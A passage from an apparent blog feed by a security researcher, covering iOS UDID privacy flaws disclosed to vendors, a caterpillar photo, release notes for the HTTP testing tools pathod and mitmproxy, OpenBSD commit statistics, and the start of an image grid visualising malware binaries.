allowed you to link a UDID to a user's identity, geolocation and Facebook\nand Twitter accounts. 
Although I didn't discuss it openly at the time, you could also\ncompletely take over an OpenFeint account, and access chat, forums, friends\nlists, and more using just a UDID. This resulted in a class-action lawsuit\nagainst OpenFeint, which has since petered out.<\/li>\n<li><a rel=\"external\" href=\"http:\/\/corte.si\/posts\/security\/apple-udid-survey\/index.html\">Later that month<\/a>, I\npublished a survey looking at how UDIDs are used in practice.\nThe data is now slightly out of date, but shows just how widely UDIDs are used and misused.<\/li>\n<li><a rel=\"external\" href=\"http:\/\/corte.si\/posts\/security\/udid-must-die\/index.html\">In September 2011<\/a>,\nI published the most troubling news so far, which\nparadoxically also got the least coverage in the press. I looked at\n<em>all<\/em> the gaming social networks on iOS - basically OpenFeint and its\ncompetitors - and found catastrophic mismanagement by nearly everyone. The\nvulnerabilities ranged from de-anonymization, to takeover of the user's gaming\nsocial network account, to the ability to completely take over the user's\nFacebook and Twitter accounts using just a UDID.<\/li>\n<\/ul>\n<p>As serious as these problems are, I'm afraid it's just the tip of the iceberg.\nNegotiating disclosure and trying to convince companies to fix their problems\nhas taken literally months of my time, so I've stopped publishing on this issue\nfor the moment. It's disheartening to say it, but some of the companies\nmentioned in my posts <em>still<\/em> have unfixed problems (they were all notified well\nin advance of any publication). I will also note ominously that I know of a\nnumber of similar vulnerabilities elsewhere in the iOS app ecosystem that I've\njust not had the time to pursue.<\/p>\n<p>When speaking to people about this, I've often been asked \"What's the worst\nthat can happen?\". My response was always that the worst case scenario would be\nif a large database of UDIDs leaked... 
and here we are.<\/p>\n"},{"title":"Defiler","published":"2012-08-26T00:00:00+00:00","updated":"2012-08-26T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/photos\/lymantriid\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/photos\/lymantriid\/","content":"<p>I've been living out of a bag for the last 3 weeks, working hard on a series of\nintense but fun audits. After running in high gear for a while I find that I\nneed a mental palate cleanser - something to help me refocus and stop me from\ngetting snowblind. I then grab my camera, strap on my macro rig, and walk out\nthe door to try to catch the local wildlife in the act. It's become a bit of a\ngame - the aim is to catch creatures in their natural setting and leave them\ncompletely undisturbed when I go, with no posing, prodding or other\ndisturbances. Getting a usable shot of a 5mm target sitting on a twig swaying in\nthe wind is a fun challenge.<\/p>\n<p>Today I find myself in Sydney, working in a part of the town that is shot\nthrough with unreasonably beautiful walking tracks. The place is also blessed\nwith a huge diversity of invertebrate life that makes my <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Dunedin\">adopted home\ntown<\/a> seem barren by comparison. I walked\nalong a nearby track until I found a quiet, leafy spot, geared up, and\nleopard-crawled through the underbrush. Not long after, I came face-to-face with\nthis imposing little chap sitting on the tip of a fern frond.<\/p>\n<div class=\"media\">\n    <a href=\".&#x2F;lymantriid2.jpg\">\n        <img src=\".&#x2F;lymantriid2.jpg\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>This is a <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Lymantriidae\">Lymantriid<\/a> caterpillar\nof some variety, probably one of the tussock moths native to Australia.\n\"Lymantria\" means \"defiler\" - some species of this family can cause huge damage\nto foliage, and are considered to be destructive pests. 
So much so, that when a\nsingle male <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Gypsy_moth\">Gypsy Moth<\/a> (Lymantria\ndispar) was discovered in Hamilton, New Zealand, they sprayed the entire city\nwith a caterpillar-specific <a rel=\"external\" href=\"http:\/\/www.biosecurity.govt.nz\/pests-diseases\/forests\/gypsy-moth\/residents\/foray.htm\">bacterial\ninsecticide<\/a>.<\/p>\n<p>No need for drastic measures with this particular fellow, though - he's native\nto this ecosystem, and the only pest is me and my camera. He was head down\nmunching away when I found him, and paid absolutely no attention to me when I\nmoved in close to get these shots. He's got reason to be cocksure, too - those\ntufts of hair on his back contain hollow, poison-filled spines that can cause a\npretty unpleasant reaction when touched.<\/p>\n<div class=\"media\">\n    <a href=\".&#x2F;lymantriid1.jpg\">\n        <img src=\".&#x2F;lymantriid1.jpg\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>A few hours exploring and photographing is a very effective brain-cleaner,\nleaving me ready to deal with spiny, venomous defilers of the digital variety.<\/p>\n"},{"title":"pathod 0.2: the daemon gets an evil twin","published":"2012-08-22T00:00:00+00:00","updated":"2012-08-22T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/pathod\/announce0_2\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/pathod\/announce0_2\/","content":"<p>I've just pushed pathod 0.2 out the door. 
This is a huge release, with many new\nfeatures:<\/p>\n<ul>\n<li><a rel=\"external\" href=\"http:\/\/pathod.net\/docs\/pathoc\">pathoc<\/a>, pathod's evil client-side twin.<\/li>\n<li><a rel=\"external\" href=\"http:\/\/pathod.net\/docs\/test\">libpathod.test<\/a>, a framework for using pathod in your unit tests.<\/li>\n<li><a rel=\"external\" href=\"http:\/\/pathod.net\/docs\/language\">Improved mini language<\/a>, including many new abilities and improvements.<\/li>\n<li>A rewrite of the networking core.<\/li>\n<\/ul>\n<p>The project also has a new website at <a rel=\"external\" href=\"http:\/\/pathod.net\">pathod.net<\/a>. Yes,\npathod is now self-hosting, so you can try out both pathod and pathoc\nspecifications right on the website. There's also a new <a rel=\"external\" href=\"http:\/\/public.pathod.net\/200:b%22hello,%20sailor.%22\">public pathod\ninstance<\/a>, which I'm sure\neveryone will use entirely responsibly.<\/p>\n"},{"title":"Introducing pathod: a pathological HTTP server","published":"2012-05-01T00:00:00+00:00","updated":"2012-05-01T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/pathod\/announce0_1\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/pathod\/announce0_1\/","content":"<p>I've just released <a rel=\"external\" href=\"http:\/\/cortesi.github.com\/pathod%22\">pathod<\/a>, a pathological\nHTTP\/S daemon useful for testing and torturing HTTP clients. At its core is a\ntiny, terse language for crafting HTTP responses. It also has a built-in web\ninterface that lets you play with the response spec language, inspect logs, and\naccess pathod's full help document.<\/p>\n<p>The rest of this post is a quick teaser showing some of pathod's abilities. 
See\nthe detailed documentation on the <a rel=\"external\" href=\"http:\/\/cortesi.github.com\/pathod%22\">pathod\nsite<\/a> if you want more.<\/p>\n<h2 id=\"the-simplest-possible-response\">The simplest possible response<\/h2>\n<p>The easiest way to craft a response is to specify it directly in the request\nURL. Let's start with the simplest possible example. Start pathod, and then visit\nthis URL:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>http:\/\/localhost:9999\/p\/200<\/span><\/span><\/code><\/pre>\n<p>The \"\/p\/\" path is the location of the response generator in pathod's default\nconfiguration - everything after that is a response specification in pathod's\nmini-language. The general form of a response spec is as follows:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>code[MESSAGE]:[colon-separated list of features]<\/span><\/span><\/code><\/pre>\n<p>In this case, we're specifying only the HTTP response code - that is, an HTTP\n200 OK with no headers and no content, resulting in a response like this:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>HTTP\/1.1 200 OK<\/span><\/span><\/code><\/pre><h2 id=\"specifying-features\">Specifying features<\/h2>\n<p>One example of a \"feature\" is a response header. Let's embellish our response by\nadding one:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>200:h&quot;Etag&quot;=&quot;foo&quot;<\/span><\/span><\/code><\/pre>\n<p>The first letter of the feature - \"h\", in this case - is a mnemonic indicating\nthe type of feature we're adding. 
The full response to this spec looks like this:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>HTTP\/1.1 200 OK<\/span><\/span>\n<span class=\"giallo-l\"><span>Etag: foo<\/span><\/span><\/code><\/pre>\n<p>Both \"Etag\" and \"foo\" are Value Specifiers, a syntax used throughout the\nresponse specification language. In this case they are literal values, as\nindicated by the fact that they are quoted strings. The Value Specification\nsyntax also lets us load values from files or generate random data. For\ninstance, here is a specification that generates 100k of random binary data for\nthe header value:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>200:h&quot;Etag&quot;=@100k<\/span><\/span><\/code><\/pre>\n<p>Now, binary data in the header value will probably break things in interesting\nways, but is unlikely to be read by the client as a valid (but over-long)\nvalue. To see if the client really drops off its perch if we feed it a single\n100k header, we have to constrain the random data. Here's the same response,\nbut with data generated only from ASCII letters:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>200:h&quot;Etag&quot;=@100k,ascii_letters<\/span><\/span><\/code><\/pre>\n<p>pathod has a large number of built-in character classes from which random\ndata can be generated.<\/p>\n<h2 id=\"pauses-and-disconnects\">Pauses and Disconnects<\/h2>\n<p>Next, we can disrupt the communications in various ways. At the moment, this\nmeans adding pauses and disconnects to a response. 
Let's start with an HTTP 404\nresponse with a body consisting of 100k of random binary data:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>404:b@100k<\/span><\/span><\/code><\/pre>\n<p>Here's the same response, but with a 120 second pause after sending 100 bytes:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>404:b@100k:p120,100<\/span><\/span><\/code><\/pre>\n<p>And, the same response again, but with a hard disconnect after sending 100 bytes:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>404:b@100k:d100<\/span><\/span><\/code><\/pre>\n<p>Instead of specifying an offset explicitly, we can ask pathod to just randomly\ndisconnect at a point of its choosing:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>404:b@100k:dr<\/span><\/span><\/code><\/pre>\n<p>That's it for the teaser - hopefully it's enough to entice you into looking at\n<a rel=\"external\" href=\"http:\/\/cortesi.github.com\/pathod%22\">pathod<\/a>'s full documentation.<\/p>\n<h2 id=\"what-s-next\">What's next?<\/h2>\n<p>pathod is an \"airport project\" - the first draft was written in its\nentirety during a 40-hour trip back home from New York (I drew a bad lot in\nstopovers). I've now firmed it up a bit, but there's still work to be done. In\nthe next month, mitmproxy's test suite will move to pathod, after which\nthere will be a simple, well-documented way to unit test. 
I also plan to build\nout the JSON API (which is used to drive pathod in test suites), and expand the\nmini-language with convenient ways  to generate pathological cookies,\nauthentication headers, SSL errors, and cache control.<\/p>\n"},{"title":"mitmproxy 0.8","published":"2012-04-09T00:00:00+00:00","updated":"2012-04-09T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce0_8\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce0_8\/","content":"<div class=\"media\">\n    <a href=\"mitmproxy_0_8.png\">\n        <img src=\"mitmproxy_0_8.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>I'm happy to announce the release of <a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy 0.8<\/a>.\nThis release has a few major new features, big speedups, and many, many small\nbugfixes and improvements. Here are the headlines:<\/p>\n<h2 id=\"android-interception\">Android interception<\/h2>\n<p>The most prominent new feature is that we now have a supported way to intercept\nAndroid traffic. What's more, we can do this without a cumbersome transparent\nproxying rig - see the <a rel=\"external\" href=\"http:\/\/mitmproxy.org\/doc\/certinstall\/android.html\">Android section in the\ndocumentation<\/a> for the\ndetails. Special thanks goes to <a rel=\"external\" href=\"http:\/\/twitter.com\/yjmbo\">Jim Cheetham<\/a> for\nlending me an Android device and helping to get this feature off the ground.<\/p>\n<h2 id=\"replacement-patterns\">Replacement patterns<\/h2>\n<p>Another exceedingly useful new feature is <a rel=\"external\" href=\"http:\/\/mitmproxy.org\/doc\/replacements.html\">replacement\npatterns<\/a>. These consist of a\nfilter, a regular expression and a replacement string, and run continuously\nwhile mitmproxy processes requests and responses. 
You can pass these either on\nthe command-line, or using a built-in replacement pattern editor.<\/p>\n<div class=\"media\">\n    <a href=\"mitmproxy0_8_replace.png\">\n        <img src=\"mitmproxy0_8_replace.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>I'm sure you can immediately think of many uses for this flexible feature, but\nmy favourite is to use it during testing as a way to conveniently inject\ncomplicated exploits into web traffic. I do this by setting a replacement\npattern that swaps a short but likely unique string (say MYXSS) for a long\nexploit, and then I use simple interaction and front-end tools like Firebug to\ninject exploits into requests manually based on the short string marker.<\/p>\n<h2 id=\"improved-pretty-printing-of-request-and-response-contents\">Improved pretty-printing of request and response contents<\/h2>\n<p>This release of mitmproxy has a completely redesigned subsystem for\npretty-printing request and response bodies. For instance, we now extract EXIF\ntags and other basic information to give you something better than a hex dump\nwhen looking at an image:<\/p>\n<div class=\"media\">\n    <a href=\"mitmproxy0_8-pretty.png\">\n        <img src=\"mitmproxy0_8-pretty.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>We also have much improved HTML indenting (using <a rel=\"external\" href=\"http:\/\/lxml.de\/\">lxml<\/a>), and\na built-in JavaScript beautifier (thanks to\n<a rel=\"external\" href=\"http:\/\/jsbeautifier.org\">JSBeautifier<\/a>) that teases out compressed and\nobfuscated scripts into something readable.<\/p>\n<h2 id=\"changelog\">Changelog<\/h2>\n<ul>\n<li>Detailed tutorial for Android interception. Some features that land in\nthis release have finally made reliable Android interception possible.<\/li>\n<li>Upstream-cert mode, which uses information from the upstream server to\ngenerate interception certificates.<\/li>\n<li>Replacement patterns that let you easily do global replacements in flows\nmatching filter patterns. 
Can be specified on the command-line, or edited\ninteractively.<\/li>\n<li>Much more sophisticated and usable pretty printing of request bodies.\nSupport for auto-indentation of JavaScript, inspection of image EXIF\ndata, and more.<\/li>\n<li>Details view for flows, showing connection and SSL cert information (X\nkeyboard shortcut).<\/li>\n<li>Server certificates are now stored and serialized in saved traffic for\nlater analysis. This means that the 0.8 serialization format is NOT\ncompatible with 0.7.<\/li>\n<li>Add a shortcut key (\"f\") to load the remainder of a request or response body,\nif it is abbreviated.<\/li>\n<li>Many other improvements, including bugfixes, an expanded scripting API,\nand more sophisticated certificate handling.<\/li>\n<\/ul>\n"},{"title":"mitmproxy 0.7","published":"2012-02-27T00:00:00+00:00","updated":"2012-02-27T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce0_7\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce0_7\/","content":"<div class=\"media\">\n    <a href=\"mitmproxy_0_7.png\">\n        <img src=\"mitmproxy_0_7.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>I'm happy to announce the release of <a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy 0.7<\/a>. The\nbiggest visible change is a new structured editor for headers, query strings\nand form fields. 
Other new features include a reverse proxy mode, an extended\nscript API that makes many common tasks much easier, and a myriad of\nimprovements to the interface (including a massive increase in speed).\nEverybody still on 0.6 should upgrade - get it here:<\/p>\n<h2 id=\"mitmproxy-0-7-tar-gz-docs\"><a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy-0.7.tar.gz<\/a> <a rel=\"external\" href=\"http:\/\/mitmproxy.org\/docs\">(docs)<\/a><\/h2>\n<p>You can also now install mitmproxy using <a rel=\"external\" href=\"http:\/\/pypi.python.org\/pypi\/pip\">pip<\/a>, like so:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">    pip<\/span><span style=\"color: #032F62;\"> install mitmproxy<\/span><\/span><\/code><\/pre>\n<p>In other news, the project has had an amazing month, after a rash of\nhigh-profile results obtained using mitmproxy were published. It started with\n<a rel=\"external\" href=\"http:\/\/mclov.in\/2012\/02\/08\/path-uploads-your-entire-address-book-to-their-servers.html\">Arun Thampi's\ndiscovery<\/a>\nthat Path uploads users' address books to their servers. Things snowballed from\nthere, and for a few days mitmproxy seemed to be everywhere. 
Similar findings\nwere made for\n<a rel=\"external\" href=\"http:\/\/markchang.tumblr.com\/post\/17244167951\/hipster-uploads-part-of-your-iphone-address-book-to-its\">Hipster<\/a>,\n<a rel=\"external\" href=\"http:\/\/www.theverge.com\/2012\/2\/14\/2798008\/ios-apps-and-the-address-book-what-you-need-to-know\">The\nVerge<\/a>\ndid a mitmproxy-driven AddressbookGate expose (including vaguely threatening\nbackground shots of mitmproxy doing its dastardly work), and lots of people said\nnice things on Twitter.<\/p>\n<p>To see the impact of all this on the mitmproxy project, you need only look at\nthe <a rel=\"external\" href=\"http:\/\/github.com\/cortesi\/mitmproxy\">GitHub page<\/a> - watchers of the repo\nwent from about 200 a month ago, to 950 at the time of this post.<\/p>\n<h2 id=\"changelog\">Changelog<\/h2>\n<ul>\n<li>New built-in key\/value editor. This lets you interactively edit URL query\nstrings, headers and URL-encoded form data.<\/li>\n<li>Extend script API to allow duplication and replay of flows.<\/li>\n<li>API for easy manipulation of URL-encoded forms and query strings.<\/li>\n<li>Add \"D\" shortcut in mitmproxy to duplicate a flow.<\/li>\n<li>Reverse proxy mode. 
In this mode mitmproxy acts as an HTTP server,\nforwarding all traffic to a specified upstream server.<\/li>\n<li>UI improvements - use Unicode characters to make GUI more compact,\nimprove spacing and layout throughout.<\/li>\n<li>Add support for filtering by HTTP method.<\/li>\n<li>Add the ability to specify an HTTP body size limit.<\/li>\n<li>Move to typed netstrings for serialization format - this makes 0.7\nbackwards-incompatible with serialized data from 0.6!<\/li>\n<li>Significant improvements in speed and responsiveness of UI.<\/li>\n<li>Many minor bugfixes and improvements.<\/li>\n<\/ul>\n"},{"title":"OpenBSD in decline?","published":"2012-02-26T00:00:00+00:00","updated":"2012-02-26T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/security\/openbsd-decline\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/security\/openbsd-decline\/","content":"<p>My leisurely Sunday activity today is to set up a new\n<a rel=\"external\" href=\"http:\/\/openbsd.org\">OpenBSD<\/a> firewall for my mobile app testing lab. I haven't\ndone a from-scratch OpenBSD install for years, so I spent some time reading\nthrough the change logs for the last few versions to catch up with what's\nchanged. Although the project is clearly still making steady, well-engineered\nprogress, I had the nagging feeling that the rate of change wasn't what it used\nto be. So, I pulled some numbers from <a rel=\"external\" href=\"http:\/\/archives.neohapsis.com\/archives\/openbsd\/cvs\/\">CVS commit message list\narchives<\/a>, and graphed\nthem. Here is the number of commits per month from January 2001 to January\n2012. 
The orange line is a simple 12-month moving average:<\/p>\n<div class=\"media\">\n    <a href=\"commitspermonth.png\">\n        <img src=\"commitspermonth.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>Now, we should be cautious about interpreting this - the number of commits\ndoesn't tell us anything about the quality, importance or magnitude of code\nchange. Even if it did all of these things, there are other and perhaps better\nmeasures of a project's health. Still, the trend is clear, and suggests a\nsustained decline in activity.<\/p>\n<p>I just <a rel=\"external\" href=\"http:\/\/openbsd.org\/orders.html\">bought some T-shirts<\/a> to help support\none of my favourite open source projects. You should too.<\/p>\n"},{"title":"Malware","published":"2012-01-05T00:00:00+00:00","updated":"2012-01-05T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/visualisation\/malware\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/visualisation\/malware\/","content":"<p><b>Edit: Since this post, I've created an interactive tool for binary\nvisualisation - see it at <a rel=\"external\" href=\"http:\/\/binvis.io\">binvis.io<\/a><\/b><\/p>\n<p>Hover and click for more.<\/p>\n<style>\n    .malware {\n    }\n    .malware tr {\n        border: 0;\n    }\n    .malware td {\n        border: 0;\n        position: relative;\n        margin:  0 auto;\n        width: 128px;\n        height: 138px;\n    }\n    .malware td img {\n        position: absolute;\n        top:0;\n        left:0;\n        overflow: hidden;\n        height: 128px;\n        width: 128px;\n    }\n    .malware td .entropy {\n        z-index: 9999;\n        transition: opacity .3s linear;\n        cursor: pointer;\n    }\n    .malware td :hover > .entropy {\n        opacity: 0;\n    }\n<\/style>\n<table class=\"malware\">\n<tr>\n<td>\n    <a href=\"0cc9e0ba6a0bd8b79aaf2be22c496228.html\">\n        <img class=\"entropy\" src='small_0cc9e0ba6a0bd8b79aaf2be22c496228_entropy.png'\/>\n        
<img class=\"charclass\" src='small_0cc9e0ba6a0bd8b79aaf2be22c496228_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"0dcfe476fbd68148f007e6c48c226e0f.html\">\n        <img class=\"entropy\" src='small_0dcfe476fbd68148f007e6c48c226e0f_entropy.png'\/>\n        <img class=\"charclass\" src='small_0dcfe476fbd68148f007e6c48c226e0f_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"03b3f30aed5b7dc39bd6e356bbde3713.html\">\n        <img class=\"entropy\" src='small_03b3f30aed5b7dc39bd6e356bbde3713_entropy.png'\/>\n        <img class=\"charclass\" src='small_03b3f30aed5b7dc39bd6e356bbde3713_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"131f1cb94df6e2969ac874503cbfd934.html\">\n        <img class=\"entropy\" src='small_131f1cb94df6e2969ac874503cbfd934_entropy.png'\/>\n        <img class=\"charclass\" src='small_131f1cb94df6e2969ac874503cbfd934_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"038e3a7add116ac69e5f9539ce461386.html\">\n        <img class=\"entropy\" src='small_038e3a7add116ac69e5f9539ce461386_entropy.png'\/>\n        <img class=\"charclass\" src='small_038e3a7add116ac69e5f9539ce461386_charclass.png'\/>\n    <\/a>\n<\/td>\n<\/tr><tr>\n<td>\n    <a href=\"094fedd2e4c175cd81dc170fd4d03917.html\">\n        <img class=\"entropy\" src='small_094fedd2e4c175cd81dc170fd4d03917_entropy.png'\/>\n        <img class=\"charclass\" src='small_094fedd2e4c175cd81dc170fd4d03917_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"1a30184661ee6585f4a188107e63a4d2.html\">\n        <img class=\"entropy\" src='small_1a30184661ee6585f4a188107e63a4d2_entropy.png'\/>\n        <img class=\"charclass\" src='small_1a30184661ee6585f4a188107e63a4d2_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"1b5bad65f8b72a52cfcae67e3e538f34.html\">\n        <img class=\"entropy\" src='small_1b5bad65f8b72a52cfcae67e3e538f34_entropy.png'\/>\n        <img class=\"charclass\" src='small_1b5bad65f8b72a52cfcae67e3e538f34_charclass.png'\/>\n    
<\/a>\n<\/td>\n<td>\n    <a href=\"163524fb9a41e6ec79178a902797f8f1.html\">\n        <img class=\"entropy\" src='small_163524fb9a41e6ec79178a902797f8f1_entropy.png'\/>\n        <img class=\"charclass\" src='small_163524fb9a41e6ec79178a902797f8f1_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"177827ae9615791e067b4a9fb4be1ab9.html\">\n        <img class=\"entropy\" src='small_177827ae9615791e067b4a9fb4be1ab9_entropy.png'\/>\n        <img class=\"charclass\" src='small_177827ae9615791e067b4a9fb4be1ab9_charclass.png'\/>\n    <\/a>\n<\/td>\n<\/tr><tr>\n<td>\n    <a href=\"1b0e377994cfdb4eec0d2fb028118844.html\">\n        <img class=\"entropy\" src='small_1b0e377994cfdb4eec0d2fb028118844_entropy.png'\/>\n        <img class=\"charclass\" src='small_1b0e377994cfdb4eec0d2fb028118844_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"0b4f82e83741e79310d797d54db5a9be.html\">\n        <img class=\"entropy\" src='small_0b4f82e83741e79310d797d54db5a9be_entropy.png'\/>\n        <img class=\"charclass\" src='small_0b4f82e83741e79310d797d54db5a9be_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"14e6950dd4bcffe54bf158a20437e6b4.html\">\n        <img class=\"entropy\" src='small_14e6950dd4bcffe54bf158a20437e6b4_entropy.png'\/>\n        <img class=\"charclass\" src='small_14e6950dd4bcffe54bf158a20437e6b4_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"1998bb714c0de980635ee9b8c1951381.html\">\n        <img class=\"entropy\" src='small_1998bb714c0de980635ee9b8c1951381_entropy.png'\/>\n        <img class=\"charclass\" src='small_1998bb714c0de980635ee9b8c1951381_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"023293a96c763bbdee3991994cdcdcef.html\">\n        <img class=\"entropy\" src='small_023293a96c763bbdee3991994cdcdcef_entropy.png'\/>\n        <img class=\"charclass\" src='small_023293a96c763bbdee3991994cdcdcef_charclass.png'\/>\n    <\/a>\n<\/td>\n<\/tr><tr>\n<td>\n    <a href=\"14064e26cbd3daed7e6eb3b4fb245c8f.html\">\n        <img 
class=\"entropy\" src='small_14064e26cbd3daed7e6eb3b4fb245c8f_entropy.png'\/>\n        <img class=\"charclass\" src='small_14064e26cbd3daed7e6eb3b4fb245c8f_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"1511f2d75e07bb94f5da8cbc031a51dd.html\">\n        <img class=\"entropy\" src='small_1511f2d75e07bb94f5da8cbc031a51dd_entropy.png'\/>\n        <img class=\"charclass\" src='small_1511f2d75e07bb94f5da8cbc031a51dd_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"14560f7dc19e6fef87743f83e5234519.html\">\n        <img class=\"entropy\" src='small_14560f7dc19e6fef87743f83e5234519_entropy.png'\/>\n        <img class=\"charclass\" src='small_14560f7dc19e6fef87743f83e5234519_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"00f29767bee5f8bd5b2d55d5be734f69.html\">\n        <img class=\"entropy\" src='small_00f29767bee5f8bd5b2d55d5be734f69_entropy.png'\/>\n        <img class=\"charclass\" src='small_00f29767bee5f8bd5b2d55d5be734f69_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"05fd535d70dfb5ee4f36e87e39d8c70d.html\">\n        <img class=\"entropy\" src='small_05fd535d70dfb5ee4f36e87e39d8c70d_entropy.png'\/>\n        <img class=\"charclass\" src='small_05fd535d70dfb5ee4f36e87e39d8c70d_charclass.png'\/>\n    <\/a>\n<\/td>\n<\/tr><tr>\n<td>\n    <a href=\"109f8c72ff91dee5906aba0e47324526.html\">\n        <img class=\"entropy\" src='small_109f8c72ff91dee5906aba0e47324526_entropy.png'\/>\n        <img class=\"charclass\" src='small_109f8c72ff91dee5906aba0e47324526_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"1aa40b6ea4e7be64d4e6a024fcdf76fe.html\">\n        <img class=\"entropy\" src='small_1aa40b6ea4e7be64d4e6a024fcdf76fe_entropy.png'\/>\n        <img class=\"charclass\" src='small_1aa40b6ea4e7be64d4e6a024fcdf76fe_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"1a3aa70d060be5e6e778e3519b400bf1.html\">\n        <img class=\"entropy\" src='small_1a3aa70d060be5e6e778e3519b400bf1_entropy.png'\/>\n        <img 
class=\"charclass\" src='small_1a3aa70d060be5e6e778e3519b400bf1_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"08b983ec55bfd50d1d2cb9a90b1ae54e.html\">\n        <img class=\"entropy\" src='small_08b983ec55bfd50d1d2cb9a90b1ae54e_entropy.png'\/>\n        <img class=\"charclass\" src='small_08b983ec55bfd50d1d2cb9a90b1ae54e_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"04240e137999dc6b5115de8db3a15f53.html\">\n        <img class=\"entropy\" src='small_04240e137999dc6b5115de8db3a15f53_entropy.png'\/>\n        <img class=\"charclass\" src='small_04240e137999dc6b5115de8db3a15f53_charclass.png'\/>\n    <\/a>\n<\/td>\n<\/tr><tr>\n<td>\n    <a href=\"08c926bf7fbb3397236effef1b30b4df.html\">\n        <img class=\"entropy\" src='small_08c926bf7fbb3397236effef1b30b4df_entropy.png'\/>\n        <img class=\"charclass\" src='small_08c926bf7fbb3397236effef1b30b4df_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"09dd27fcccb9c000d37c6394364be1b5.html\">\n        <img class=\"entropy\" src='small_09dd27fcccb9c000d37c6394364be1b5_entropy.png'\/>\n        <img class=\"charclass\" src='small_09dd27fcccb9c000d37c6394364be1b5_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"0bcee1314e8c61fa8ef55743f3bb7742.html\">\n        <img class=\"entropy\" src='small_0bcee1314e8c61fa8ef55743f3bb7742_entropy.png'\/>\n        <img class=\"charclass\" src='small_0bcee1314e8c61fa8ef55743f3bb7742_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"0e2bf707dbc146c9d60c373237d050b7.html\">\n        <img class=\"entropy\" src='small_0e2bf707dbc146c9d60c373237d050b7_entropy.png'\/>\n        <img class=\"charclass\" src='small_0e2bf707dbc146c9d60c373237d050b7_charclass.png'\/>\n    